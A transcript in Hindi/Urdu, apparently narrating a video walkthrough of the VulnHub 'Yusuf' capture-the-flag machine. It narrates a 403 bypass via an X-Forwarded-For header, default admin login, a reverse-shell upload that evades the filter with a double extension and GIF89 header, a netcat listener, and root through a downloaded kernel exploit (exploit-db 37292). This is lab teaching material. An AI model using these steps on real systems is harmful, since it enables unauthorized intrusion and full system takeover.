होस्ट। मैंने ये इस तरह से वर्ड लाइन को कंप्लीट किया। बट अभी फिल वक्त मैं इसे मूव कर रहा हूँ। मूव करके मैं यहाँ पे सेंड पे क्लिक करता हूँ तो आप यहाँ देखते हैं कि आपको क्या रिजल्ट नजर आता है कि फॉरबिडन का एरर आपको नजर आ रहा है कि एचटीटीपी पे जो एरर आ रहा है तो फॉरबिडन 403 का एरर आ रहा है। तो अगर मैं इस जगह पे वो कमांड पेस्ट कर देता हूँ एक्स फॉरवर्डेड फॉर लोकल होस्ट देन सेंड करता हूं तो आप नोट करें यहाँ पे स्टेटस मेरे पास 200 आया और सारा डाटा उसने यहाँ पे फेच कर लिया। डाटा फेच करने के बाद उसने यहाँ पे मुझे बताया कि बेसिकली डाटे में क्या कुछ मौजूद है। मैं एक बार देख लेता हूँ। तो आप यहाँ पे नोट कर सकते हैं कि बेसिकली ये सारे हेडर के बाद एक HTML का फॉर्म है, HTML का पेज है, फॉर्म नजर आ रहा है मुझे, यहाँ पे सारी चीजें नजर आ रही हैं। अब मुझे यहीं पे इसी फॉर्म को सारे डाटे को शो करवाना है ब्राउजर के अंदर। तो मुझे क्या करना होगा, यहीं पे राइट क्लिक करके देखना है शो रिस्पॉन्स इन ब्राउजर, इस पे क्लिक करेंगे एक ऑटोमेटिकली एक यूआरएल जनरेट हो जाएगा। इसको आप कॉपी करके ब्राउजर के यूआरएल में पेस्ट करके इंटर करेंगे तो आपका ऑटोमेटिकली आपको वो फॉर्म एक्सेस हो जाएगा प्रॉक्सी के थ्रू। देखिए जैसे ही मैंने वो रेंडमली यूआरएल पेस्ट किया जो ऑटो जनरेट करके पर्स ने मुझे दिया था, मैंने इंटर प्रेस किया तो आप यहाँ देखते हैं फर्स्ट नेम लास्ट नेम आ रहा है। तो फर्स्ट नेम यहाँ पुट कर देता हूँ महमूद अली और मतलब यूजर नेम एंड पासवर्ड पुट कर लेता हूँ मैं यहाँ पे अपना महमूद 123 और सबमिट पे क्लिक करता हूँ। तो आप देखेंगे यहाँ पे मेरे पास प्रॉक्सी के अंदर फॉरवर्डेड फॉरवर्डेड फॉरवर्डेड। तो मैं इसे एक बार मैं दोबारा से चला जाता हूँ, मुझे पता फॉरवर्ड कर दिया डाटा को। ठीक है, मैं यहाँ नेम पुट किया था महमूद अली, पासवर्ड महमूद 123 और सबमिट। जैसे ही सबमिट पे क्लिक किया प्रॉक्सी देखिए हाईलाइट हो गया। इसके इंटरसेप्ट के अंदर मेरे पास यहाँ पे रिक्वेस्ट आ गई यूजर नेम महमूद अली और पासवर्ड महमूद 123 के नाम से।
देन अब मुझे क्या करना है, सेम दोबारा सेम वही प्रोसीजर इस्तेमाल करना है। सेंड ऑपरेटर रिपीटर में सेकंड रिक्वेस्ट आ गई। यहाँ पे मैं इसकी मॉनिपुलेट करूंगा। मैंने यहाँ पे लिख दिया एडमिन, ठीक है, क्योंकि ये बहुत इजीली बस डाटा है जिसे आप एडमिन एडमिन लिख के, एडमिन यूजर नेम एडमिन पासवर्ड लिख के मैं रिक्वेस्ट को चेक करता हूँ कि क्या रिक्वेस्ट अब मूव हो रही है कि नहीं। आपको इस पर ये चीज़ों का ख्याल रखना है, एक बार स्टडी करना है आपको इन चीज़ों के हवाले से, और चेक करना है कि क्या चीज़ें ऐसे ऐसे हो रही हैं जैसा आपको लग रहा है कि नहीं। ठीक है, तो बेसिक मशीन है ये, इसलिए मैंने यहाँ पे बाय डिफॉल्ट एडमिन यूजर नेम और पासवर्ड भी एडमिन लिखा। और मुझे यहाँ पे होस्ट के नीचे वो सेम कमांड दोबारा से पुट करनी है, कैपिटल एक्स डैश फॉरवर्डेड डैश फॉर कॉलम लगाने के बाद लोकल होस्ट। देन सेंड पे क्लिक करता हूँ तो यहाँ पे आप देखेंगे मेरे पास फिर से रिजल्ट आ गया। और यही रिजल्ट को मैं फिर से सेम वही प्रोसेस कॉपी करता हूँ, ठीक है, शो रिस्पॉन्स इन ब्राउजर, और कॉपी करने के बाद यहाँ ब्राउजर में पेस्ट करता हूँ। ठीक है, देखिए मैंने एडमिन लिख के एंटर किया, तो आप यहाँ नोट कर सकते हैं। देखिए मेरे पास यहाँ पे एडमिन साइड एक्सेस हो गई, एडमिन शेयर का डैशबोर्ड एक्सेस हो गया, जिसमें डैशबोर्ड, यूजर्स, फाइल्स और लॉगआउट का फोल्डर है। मैं यहाँ पे फाइल अपलोड्स पे क्लिक करता हूँ। फाइल अपलोड पे क्लिक करने के बाद जैसे ही मैंने यहाँ क्लिक किया, आप नोट करेंगे यहाँ पे फिर मेरे पास इंटरसेप्ट के अंदर सेम रिक्वेस्ट आ गई। अब इस रिक्वेस्ट को मुझे एक बार फिर से मूव करवाना है, या फॉरवर्ड कर देते हैं। फॉरवर्ड करते हैं तो ये देखिए मैं उसमें मूव कर पाता हूँ कि नहीं, मुझे ये चीज़ देखनी है। ठीक है, मैं यहाँ पे रिक्वेस्ट को फॉरवर्ड कर रहा हूँ और नोट कर रहा हूँ। ये देखिए मेरे पास एडमिनिस्ट्रेशन के अंदर अपलोड्स के फोल्डर में यहाँ पे मेरे पास फाइल आ रही है। अब सबसे पहले यहाँ पे कह रहा है कि जो डॉक्यूमेंट ब्राउज, यानी कि अब मुझे यहाँ पर कोई भी बैरस शेल अपलोड कर सकता हूँ और उसे फाइल को मूव करवा सकता हूँ। तो सबसे पहले मुझे अब शेल अपलोड करने के लिए यहाँ पे शेल बनाना पड़ेगा, या फिर नेट से शेल डाउनलोड करके लेके आना पड़ेगा। तो मैं यहाँ क्या करता हूँ, एक फॉर द टाइम बीइंग मैं गूगल पे जाके वहाँ से शेल को डाउनलोड करके लेके आता हूँ। ठीक है, तो मैं यहाँ नीचे यहीं पे आने के बाद व्हाट्सएप कुछ टाइम के लिए ऑफ कर देता हूँ। यहीं पे ऑफ करने के बाद रिवर्स रिवर्स पीएचपी शेल, इस पे मैं क्लिक करता हूँ। तो बाय डिफॉल्ट मुझे यहाँ पे पेन टेस्ट मंकी गिटहब की एक बेसिकली रिपोजिटरी यहाँ मुझे मिल जाएगी। मैं उस पर मूव करूँगा। तो उस पर मूव करने के बाद मेरे पास यहाँ पे कुछ फाइल नजर आएंगी। यहाँ पे पीएचपी रिवर्स शेल के नाम फाइल है, मैं इस पर क्लिक करता हूँ। अब मेरे पास ये सारे के सारे यहाँ पे कोडिंग मौजूद है। सो यहाँ से मैं रॉ बटन पे क्लिक करता हूँ तो मेरे पास ये प्रॉपर कोड जो है यहाँ पे नजर आ जाएगा। तो इसे मैं प्रॉपर कंट्रोल ए सेलेक्ट ऑल करके कंट्रोल सी से कॉपी कर लूंगा। देन मैं दोबारा से कॉपी करने के बाद बग सूट को एक्टिव कर लूंगा, क्योंकि मुझे रिक्वेस्ट बग सूट में ही चाहिए। तो उसके बाद यहाँ पे मैं एडिटर टेक्स्ट एडिटर ओपन करता हूँ। कोई सा भी टेक्स्ट एडिटर ओपन करके आपको ये कोड पेस्ट करना है, और यहाँ पे थोड़ी सी चेंजिंग करनी है। कोड पेस्ट करने के बाद आपने यहाँ पे देखना है कि ये रिवर्स शेल के अंदर आपने नोट करना है कि यहाँ पे टाइम सेट और उसके नीचे आईपी $IP यहाँ पे आपको नजर आ रहा होगा। ये आईपी एड्रेस जो है ये आपको चेंज करना है। ये आईपी एड्रेस मुझे लगाना है जो मेरे सिस्टम पर आईपी एड्रेस है, जहाँ पे मुझे रिवर्स शेल चाहिए। तो मैं अपने सिस्टम का आईपी ऑलरेडी चेक कर चुका हूँ, जैसा कि मैंने आपको दिखाया था। मैं एक बार फिर से ओपन करके दिखा रहा हूँ, आईपी एड्रेस चेक करके दिखा रहा हूँ। तो सीएमडी एक्सेस करने के बाद आप यहाँ लिखेंगे आईपी कॉन्फिग और इंटर करेंगे। यहाँ पे आपको आईपी एड्रेस आपका नजर आ जाएगा, ये वाला। ठीक है, अब सेम यही आईपी एड्रेस मैं इस जगह पे पेस्ट कर देता हूँ, रिप्लेस कर देता हूँ 127.0.1 के साथ 192.168.1.15 आईपी एड्रेस। लिखने के बाद मैं ये फाइल सेव करता हूँ। मैं फॉर एग्जाम्पल फिल वक्त ये डेस्कटॉप पे ही फाइल सेव कर लेता हूँ।
मैं यहाँ सेव कर रहा हूँ फाइल shell.php के नाम से। shell.php के नाम से मैंने फाइल सेव की। देन उसके बाद मेरे पास फाइल मौजूद है जो कि मैं यहाँ पे अपलोड के बटन के थ्रू अपलोड कर सकता हूँ। और अपलोड के बटन पे अब मैंने क्लिक किया। क्लिक करने के बाद फाइल शेल ओपन किया, shell.php, और सेंड पे क्लिक कर देता हूँ। जैसे ही मैं सेंड पे क्लिक करता हूँ, आप नोट करेंगे कि मुझे दोबारा से रिक्वेस्ट जो है वो बफ सूट में आ गई। और ये देखिए सारी की सारी वही फाइल का डाटा यहाँ पे शो हो रहा है कि इंटरसेप्ट के अंदर बफ के थ्रू मुझे रिक्वेस्ट आई। यहाँ पे पूरी पूरी रिक्वेस्ट मेथड लिखा हुआ है। देन उसके बाद यहाँ पे कंटेंट लिखा हुआ है, बैकएंड की क्यूरी, और फर्दर नीचे शेल लिखा हुआ है। मैं इतने पे अगर फॉरवर्ड करता हूँ तो क्या होता है, फॉरवर्ड किया तो उसने मुझे यहाँ पे एरर दिया कि फाइल नॉट अलाउड। और अगर आप एक बार फिर से फाइल को अपलोड करें और एक चीज नोट करें तो आपको अंदाजा होगा। फाइल सेंड करने के बाद आप यहाँ नोट करें, आपको यहाँ पे पता चलेगा कि बेसिकली शेल में अपलोड कर रहा हूँ, ठीक है, PHP का, और PHP फाइल अलाउ नहीं है। तो मैं फिलहाल से ड्रॉप कर देता हूँ। ड्रॉप करने के बाद ब्लैंक टेक्स्ट रिक्वेस्ट को मैं यहाँ पे ओपन करता हूँ। अब बेसिकली अब मुझे यहाँ पे एक चीज का अंदाजा हुआ कि जब मैंने रिक्वेस्ट को चेक किया था तो यहाँ पे PNG फाइल अलाउ है, क्या PNG फॉर्मेट की कोई भी पिक्चर यहाँ फाइल अपलोड कर सकते हैं। तो मैं इसे क्या करूँगा, लिनक्स को कंफ्यूज करने के लिए यहाँ पे shell.png.php.png नेम को रीनेम कर दूंगा। इससे क्या है, वैसे पिक्चर हमारे पास वहाँ पे डिटेक्ट करेगा, जिससे इजीली हम इसे ओपन कर सकते हैं। तो मैं दोबारा से ओपन करता हूँ और मेरा नाम क्या है, shell.php.png। सेंड के बटन पे क्लिक करता हूँ तो बफ सूट में रिक्वेस्ट आ जाएगी। ठीक है, देखिए फाइल अपलोड होगी, लेकिन मुझे ये PHP में नहीं PNG में चाहिए थी। तो PNG में लेके आने के लिए मैं दोबारा से एक बार फिर से इसी फाइल को एक्सेस करवा के सेंड के बटन पे क्लिक करता हूँ। ठीक है, ये सारी यहाँ फाइल आ गई। आने के बाद मैं यहाँ से इसकी रिक्वेस्ट जो है वो चेंज करता हूँ, shell.php के या बजाय मैं यहाँ पे सिर्फ वो PNG रिमूव करने के बाद बॉटम पे आके मैं यहाँ पे लिख देता हूँ, एक कोड लिखता हूँ। बेसिकली जो कोड मुझे यहाँ पे इंक्रिप्शन है, जो जो कि मैं यहाँ लिखता हूँ कैपिटल में GIF 89 सेमीकोलन, GIF 89 सेमीकोलन लिखने के बाद मैं यहाँ पे इस रिक्वेस्ट को कर देता हूँ फॉरवर्ड। जैसे इस रिक्वेस्ट को फॉरवर्ड करूंगा तो आप नोट करेंगे यहाँ फाइल अपलोडेड, फाइल्स, और आगे ये एक नाम दिया। मैं इसको कॉपी करने के बाद यहीं पे URL में पेस्ट करके इंटर करूंगा तो मेरे पास रिवर्स शेल एक्टिव हो जाएगा। बट ये काम करने से पहले मुझे यहाँ पे लिसनर लगाना है, क्योंकि पोर्ट को लिसन करने के लिए लिसनर लगाना लाजमी होता है। अब मैं लिसनर लगाने के लिए यहाँ पे NC कमांड टाइप करने के बाद हाइफन, मुझे यहाँ पे आगे लिखना है, कमांड एक पुट करनी है, LNVP, आगे पोर्ट नंबर, LNVP पोर्ट नंबर देने के बाद इंटर प्रेस करता हूँ। उस पोर्ट नंबर पे मुझे रिक्वेस्ट एक्सेस करवाएगा। जैसे ही मैंने बात देने के बाद इंटर प्रेस किया तो आप यहाँ नोट करेंगे कि मेरे पास लिस्टनर में रिक्वेस्ट आ जाएगी। हाँ, तो मुझे बफ में जाके रिक्वेस्ट को फॉरवर्ड भी करना है। तो ये देखें जी, मेरे पास यहाँ पे रिक्वेस्ट आ गई, शेल एक्टिव हो गया, जिसने मुझे एक्सेस दे दी है। देखें राइट एक्सेस मेरे पास यहाँ मौजूद है, चीज़ें यहाँ मौजूद हैं। और सबसे पहले अब मैं यहाँ पे PWD करके देखता हूँ कि मैं कहाँ पे हूँ। मैं स्लैश में हूँ, ठीक है, मेन राउट पे हूँ। अब इसके अंदर मतलब मैं होम में जा सकता हूँ, स्लैश होम dir। तो ये देखिए एक पहली फाइल यूसुफ user.txt और यूसुफ के नाम से फाइल है। तो इससे एक चीज क्लियर होगी मेरी कि मैं बेसिकली यहाँ पे cat user डॉट txt एंड इंटर, दिस इज अ फ्लैग। पहला फ्लैग मैंने गेट कर लिया। तो पहला फ्लैग गेट कर लिया मैंने। अब टारगेट है मेरा दूसरा फ्लैग,
सेकंड फ्लैग को गेट करना। सेकंड फ्लैग को गेट करने के लिए मेरे पास एक्सप्लॉइट का होना लाजमी है। मैं पहले नंबर पे पाइथन का जो pty शेल है मैं उसे अपलोड करने की कोशिश करता हूँ। अगर उससे मेरे पास फ्लैग आता है तो ठीक, नहीं तो मुझे कोई और चीज देखनी पड़ेगी। ओके जी, पहला फ्लैग हमारे पास आने के बाद अब हमने दूसरे फ्लैग को गेट करना है। दूसरे फ्लैग को गेट करने के लिए हमारे पास रूट एक्सेस का होना लाजमी है। रूट एक्सेस के लिए सबसे पहले मैं प्रिविलेजेस एस्केपिंग करना शुरू करता हूँ। तो प्रिविलेजेस एस्केप करने के लिए मैं 2 लाइनों का कोड लिखता हूँ आपके सामने। पहली कमांड मैं यहाँ पुट कर रहा हूँ, ओके, एक्सपोर्ट TERM X TERM इंटर, पहली कमांड। दूसरी कमांड मेरे पास है यहाँ पाइथन 3 में बना हुआ एक शेल है जिसे मैं यहाँ पे एक लाइब्रेरी को इंपोर्ट करूंगा। इंपोर्ट pty सेमीकोलन स्पेस pty का एक फंक्शन है spawn, वो कॉल करता हूँ। वो कॉल करने के लिए मेरे पास bin /bash सिंगल कोट और सेमीकोलन इंटर। देखिए जी, मैं इस PTL से मैं सिस्टम के अंदर इंसर्ट तो हो गया, लेकिन क्या मुझे रूट एक्सेस मिली? इंटर, रूट एक्सेस इज नॉट अवेलेबल, परमिशन डिनाई। ये देखिए जी, रूट एक्सेस रूट फोल्डर में मैं इंसर्ट होने की कोशिश कर रहा हूँ, परमिशन डिनाई दे रहा है। इट मींस कि मुझे परमिशन नहीं मिली। अब सबसे पहले तो मुझे यहाँ पे परमिशन नहीं मिली, तो मैं फाइंड करके देखता हूँ फोल्डर के थ्रू। फाइंडिंग करने के लिए मेरे पास यहाँ कमांड है फाइंड FIND हाइफन PERM हाइफन U इक्वल एस, आगे हाइफन टाइप देने के बाद स्पेस F स्पेस 2 ग्रेटर देन स्लैश डेव स्लैश नल इंटर। अब देखते हैं कि मुझे क्या रिजल्ट्स मिलते हैं। क्या मैं अब रूट में मूव कर सकता हूँ? अभी भी मेरे पास परमिशन नहीं आई, तो इट मीन्स कि मेरे पास परमिशन अभी भी नहीं आई। सो अब मैं कर्नल इन्फॉर्मेशन यूज करके एक्सप्लॉइट सर्च करता हूँ कि अगर परमिशन मेरे पास अभी नहीं आई तो मेरे पास एक्सप्लॉइट परमिशन एक्सप्लॉइट्स कौन कौन से अवेलेबल हैं इस कर्नल को लेकर। सबसे पहले मुझे कर्नल की इन्फॉर्मेशन गेट करने के लिए यू नेम, मैं कमांड पुट कर रहा हूँ यू नेम, ठीक है, यू नेम हाइफन ए, ठीक है, ये एक कमांड है जो मैं पुट कर रहा हूँ, मैंने यहाँ पे पुट कर दी। ठीक है, आप देख सकते हैं ये कमांड पुट करने के बाद मैं इंटर प्रेस करूंगा तो यहाँ पे मुझे एक बेसिकली प्रॉपर कर्नल की डिटेल नजर आ रही है। सो इसमें जो मेरे काम की है वो है ये वर्जन। ये वर्जन में यहाँ से कॉपी कर लूंगा। कॉपी करने के बाद मुझे अब ये सर्च एक्सप्लॉइट से सर्च करना है। अब इस सर्च एक्सप्लॉइट से सर्च करने के लिए मेरे पास 2 ऑप्शंस हैं। मैं यहाँ से भी सर्च कर सकता हूँ और गूगल पे भी जाके ऑनलाइन सर्च कर सकता हूँ। तो सर्च एक्सप्लॉइट से सर्च करने के लिए मैं यहाँ पे यूज करता हूँ सर्च एक साइट ओपन कर लेता हूँ, एक न्यू फाइल या एक न्यू टैब ओपन कर लेते हैं जिसमें मैं सर्च कर सकता हूँ सर्च exploit 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 search exploit paste or enter search exploit is not available. Okay, command SEARCH search exploit exploit। ओके, तो हम प्रॉक्सी ऑफ करके यहाँ पे एक्सप्लॉइट डैश डीबी पे मूव करते हैं। एक्सप्लॉइट डैश डीबी पे मूव करने के बाद मैं यहाँ से उस एक्सप्लॉइट को सर्च कर सकता हूँ।
देखें जी, मुझे यहाँ पे 2 एक्सप्लॉइट नज़र आ रही हैं। सबसे पहली एक्सप्लॉइट एंड सेकंड एक्सप्लॉइट ये नज़र आ रही है, ठीक है। इनमें से कोई भी एक एक्सप्लॉइट मैं यूज़ कर सकता हूँ अपने प्रिविलेजेस को हासिल करने के लिए। तो मैं इनमें से एक एक्सप्लॉइट पे क्लिक करता हूँ, ठीक है। ये मैं नीचे एक्सप्लॉइट पे क्लिक किया, जो एक्सप्लॉइट की मुझे यहाँ पे BDID नज़र आ रहा है। एक्सप्लॉइट डेटाबेस ID मुझे नज़र आ रही है यहाँ पे 37292 ID नज़र आ रही है, और ये काम कैसे करता है वो साइड नज़र आ रही है। बेसिकली ये C ड्राइव में C लैंग्वेज में बनी हुई एक फाइल है, जो कि मैं इसे यूटिलाइज कर सकता हूँ। अब इसे मैं यहाँ मेटास्प्लॉइट के थ्रू डाउनलोड कर लेता हूँ। सर्च एक्सप्लॉइट के थ्रू इसे डाउनलोड कर लेते हैं। सर्च डाउनलोड करने के लिए मैं यहाँ पहले नंबर पे टेक्स्ट चेंज कर लेता हूँ, डेस्कटॉप पे मूव करता हूँ। डेस्कटॉप पे मूव करने के लिए मैं यहाँ कहता हूँ सर्च एक्सप्लॉइट -m देने के बाद एक्सप्लॉइट आईडी दूंगा। एक्सप्लॉइट आईडी है 3792292.c। इंटर सर्च एक्सप्लॉइट इज नॉट अवेलेबल, तो मेरे ख्याल से मेरे पास सर्च एक्सप्लॉइट अवेलेबल नहीं। मैं यहाँ पे दोबारा से लिख रहा हूँ सर्च एक्सप्लॉइट सर्च एक्सप्लॉइट। आगे मैं यहाँ पे आईडी लिख रहा हूँ इसकी, यहाँ आईडी के अलावा मैं उसका वर्जन पेस्ट करके इंटर करता हूँ। ओके, अब हाँ, अब मेरे पास यहाँ रिजल्ट्स आ रहे हैं, ठीक है। देखिए सेम रिजल्ट्स हैं। 37292 ऑनलाइन मैंने वेरीफाई किया, मुझे एक्सप्लॉइट्स यहाँ नज़र आ गई। देन यहाँ पे मैंने वेरीफाई किया, मुझे यहाँ पे उसने वो आईडी बता दी। अब आईडी है 37292.c। अब मैं 37292.c प्रेस करूंगा उसे सर्च को डाउनलोड करने के लिए। सर्च एक्सप्लॉइट -m के बाद हम आईडी लिख देते हैं। आईडी है मेरे पास 37292.c। बेसिकली हम आईडी नहीं, ये फाइल के अंदर यहाँ पाथ लिख रहे हैं। लिखने के बाद इंटर प्रेस करते हैं तो आप नोट करेंगे यहाँ पे वॉइड मेरे पास एक्सप्लॉइट यहाँ पे फाइल आ गई, ठीक है। ये फाइल यहाँ पे अब मेरे पास स्टोर होने के बाद मैं सबसे पहले इस फाइल को मूव या कॉपी कर देता हूँ। अपनी इस फाइल को अपने फोल्डर के अंदर, एक अपाची के फोल्डर के अंदर कॉपी करने के लिए आपके पास पाथ है पड़ा /var/www/html और इंटर। ये फाइल मेरी एक पेस्ट नहीं हुई। ओके, परमिशन चाहिए, परमिशन मुझे नहीं दी, सूडो लगा के इंटर कर देते हैं। फाइल कॉपी हो गई। फाइल कॉपी होने के बाद मैं सूडो सर्विस अपाची टू अपाची सर्विस स्टार्ट कर देता हूँ। अपाची सर्विस स्टार्ट करने के बाद मेरे पास आईपी में ये कंफर्म है, बट एक बार फिर से मैं वेरीफाई कर लेता हूँ आईपी एड्रेस। ओके, 15 मेरा आईपी एड्रेस है। और अब मुझे यहाँ पे फाइल को करना है गेट। फाइल को गेट करने के लिए मुझे सबसे पहले तो cd/temp में जाना है। cd/temp में जाने के बाद यहाँ पे मैं फाइल डाउनलोड कर रहा हूँ wget करने के बाद आपके पास यहाँ पे होगा http://192.168.1.15/37292.c फाइल का नेम, देन इंटर। फाइल डाउनलोड हो गई। ls करके चेक करते हैं, ये देखेंगे ls के बाद ये फाइल डाउनलोड हो गई। अब इसे मैं सबसे पहले कंपाइल कर लेता हूँ, और इसे कंपाइल करने के लिए मुझे gcc फाइल का नेम चाहिए होगा, और इसे मैं यहाँ पे लिख लेते हैं। और इस तरह से नॉर्मली gcc आगे फाइल नेम, और देन उसके बाद हम इसे यूटिलाइज कर सकते हैं। तो gcc फाइल नेम है मेरे पास 37292.c, और आगे यहाँ पे मुझे बेसिकली देनी है आउटपुट में मैं कह रहा हूँ ये फाइल आ जाए एक्स्ट्रा के नाम से या TRA के नाम से, या मैं वाइट डेवल कर देता हूँ, वाइट डेवल के नाम से ये फाइल आ जाए, देन इंटर। वाइट डेवल के नाम से फाइल आ जाएगी। मैं राइट क्लिक ls करके इंटर कर रहा हूँ, तो आप नोट कर सकते हैं कि ये मेरे पास सी लैंग्वेज की फाइल है, जिसे मैंने कंपाइल कर लिया वाइट डेवल के नेम से।
वाइट डेवल के नेम से फाइल मेरे पास मौजूद है। अब जस्ट मुझे वाइट डेवल की जो फाइल है इसको परमिशन राइट साइन करने हैं। राइट साइन करने के लिए मैंने chmod कमांड लिखने के बाद +X का बटन प्रेस किया और आगे वाइट डेवल फाइल नेम लिखने के बाद अब मैं इस फाइल को एक्सप्लॉइट को वाइट डेवल वाली फाइल को रन करूंगा जो कि एक एग्जीक्यूटेबल फाइल है। रन करने के लिए ./white डेवल और इंटर। सो बूम, हम बेसिकली रूट में आ चुके हैं। हो एम आई बेसिकली देख सकते हैं आप कि यहाँ हमारे पास डॉलर साइन है जो कि स्टैंडर्ड यूजर की अलामत है और यहाँ पे एक हैश साइन है जो कि एक रूट यूजर की अलामत है। तो मैं यहाँ पे इंटर करता हूँ तो मुझे बता भी रहा है कि मैं इस वक्त रूट यूजर में हूँ। आईडी अगर 00 है तो आप वाकई रूट में हैं। UID 0, GID 0, ग्रुप्स 0, इट मीन्स अब आप रूट एक्सेस में मौजूद हैं। अब बेसिकली मुझे सेकंड फ्लैग जो कि मेरा रूट डायरेक्टरी के अंदर है वो ढूंढना है। सेकंड फ्लैग के लिए मैं यहाँ पे cd/root करके इंटर प्रेस करता हूँ, देन dir। तो यहाँ देख सकते हैं आप root.txt के नाम से फाइल मौजूद है जिसे मैं कैट कर लेता हूँ, cat root.txt इंटर। तो ये देखेंगे हमारी सेकंड फ्लैग में हमारे पास आ चुका है कंप्लीटली। तो इस तरह से हमने बेसिकली अपने एक्सप्लॉइट को कंप्लीट किया। हमने अपनी यूसुफ CTF जो था हमारे पास वर्नहब.com से हमने उसे कंप्लीट कर लिया। कंप्लीट करने के बाद हमारे पास दो कीज थी उसकी, यूजर की और रूट की। हमने यूजर की भी गेट की, रूट की भी गेट की। ठीक है, तो इस तरह से हमारे पास बेसिकली CTF सारे हम खेलते हैं और प्ले करते हैं चीज़ों को। उम्मीद करता हूँ कि आपको ये देख के मज़ा आया होगा चीज़ें कैसे हो रही हैं। ठीक है, तो हमारे साथ लगे रहें, कायम रहें इंशाअल्लाह। हम इस तरह से ऐसे इंटरेस्टिंग कंटेंट अपना हर हफ्ते में 1 या 2 लेके आएंगे। CTF अपने अपलोड करेंगे। हमारे चैनल के साथ बने रहें। ठीक है, फी ईमान अल्लाह।